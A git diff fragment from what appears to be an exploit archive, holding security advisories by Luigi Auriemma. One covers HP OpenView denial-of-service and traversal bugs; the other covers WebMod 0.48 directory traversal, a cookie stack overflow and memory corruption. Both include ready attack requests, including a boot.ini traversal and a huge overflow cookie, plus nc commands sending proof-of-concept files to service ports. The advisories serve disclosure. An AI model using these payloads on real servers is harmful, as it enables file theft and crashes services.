%[^\n]" + + +----------------------------- +C] NULL pointer in ovalarmsrv +----------------------------- + +The parameter which specifies the amount of sub-arguments described +above is used to allocate a certain amount of initial dynamic memory +(value * 2) for storing all the sub-arguments which is then +reallocated wheen needed. + +Specifying a too big unallocable amount of sub-arguments results in a +NULL pointer which will crash the service. + + +--------------------------------- +D] process termination in ovtopmd +--------------------------------- + +The ovtopmd service listening on port 2532 uses a special type of +packet (0x36) for forcing the termination of the process ("Exiting due +to request of ovtopmd -k."), so an attacker can use this packet for +causing a Denial of Service. + + +####################################################################### + +=========== +3) The Code +=========== + + +A] +http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini + +B,C,D] +http://aluigi.org/poc/closedviewx.zip + + nc SERVER 2954 -v -v -w 2 < closedviewx1.txt + nc SERVER 2954 -v -v < closedviewx2.txt + nc SERVER 2532 -v -v < closedviewx3.txt + + +####################################################################### + +====== +4) Fix +====== + + +HP has been alerted and is working on a fix + + +####################################################################### + +# milw0rm.com [2008-04-11] diff --git a/platforms/multiple/remote/5534.txt b/platforms/multiple/remote/5534.txt index c9b70ed08..610f75a9a 100755 --- a/platforms/multiple/remote/5534.txt +++ b/platforms/multiple/remote/5534.txt @@ -1,151 +1,151 @@ -####################################################################### - - Luigi Auriemma - -Application: WebMod - http://www.djeyl.net/w.php -Versions: <= 0.48 -Platforms: Windows and Linux -Bugs: A] directory traversal - B] Cookie buffer-overflow - C] parser.cpp arbitrary memory writing - D] scripts source disclosure -Exploitation: remote -Date: 03 May 2008 -Author: Luigi Auriemma - e-mail: aluigi@autistici.org - web: aluigi.org - - -####################################################################### - - -1) Introduction -2) Bugs -3) The Code -4) Fix - - -####################################################################### - -=============== -1) Introduction -=============== - - -WebMod is an open source MetaMod plugin which acts as a web server for -Half-Life running on the equivalent TCP port of the UDP one used by the -game. - - -####################################################################### - -======= -2) Bugs -======= - ----------------------- -A] directory traversal ----------------------- - -WebMod uses an anti-directory traversal check which searchs for any -"../" pattern in the HTTP request of the client. -So it's enough to use a "..\" pattern to bypass the check and being -able to download any file from the disk where Half-Life is running -included the configuration files of the game server (like -..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg). -Note that this bug works only on Windows servers. - ->From server.cpp: - -void clientHandle(int connfd, httpquery_t *query, int tid) - ... - if(strstr(str,"../")) // hack attempt, display index page - { - str[0]='\0'; - } - - -------------------------- -B] Cookie buffer-overflow -------------------------- - -A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a -stack based buffer-overflow. - ->From server.cpp: - -void connectHandle(void *data) -{ -char *input; -char buf[MYSOCK_BUFLEN+1]; - ... - for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++) - buf[j]=input[i]; - - --------------------------------------- -C] parser.cpp arbitrary memory writing --------------------------------------- - -The functions in parser.cpp are affected by some memory corruption -vulnerabilities with different effects depending by the type of -variable/script used. -In short a value longer than MAX_FILE_SIZE (16384) bytes can lead to -the writing of custom data in a custom memory address through strcat -(auth.w?mode) or a NULL pointer (auth.w?redir) or an invalid memory -access (the rconpass parameter of auth.w) and so on. - - ----------------------------- -D] scripts source disclosure ----------------------------- - -Adding a dot at the end of the requested URI allows the viewing of the -script source code instead of executing it. -This bug (which should work only on FAT/NTFS filesystems) can be -considered a security vulnerability ONLY if the server runs custom -scripts. - - -####################################################################### - -=========== -3) The Code -=========== - - -http://aluigi.org/poc/webmodz.zip - - nc SERVER PORT -v -v < webmodz1.txt - -GET /..\..\..\..\..\..\boot.ini HTTP/1.0 - - nc SERVER PORT -v -v < webmodz2.txt - -GET /config.w HTTP/1.0 - -Cookie: rconpass=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA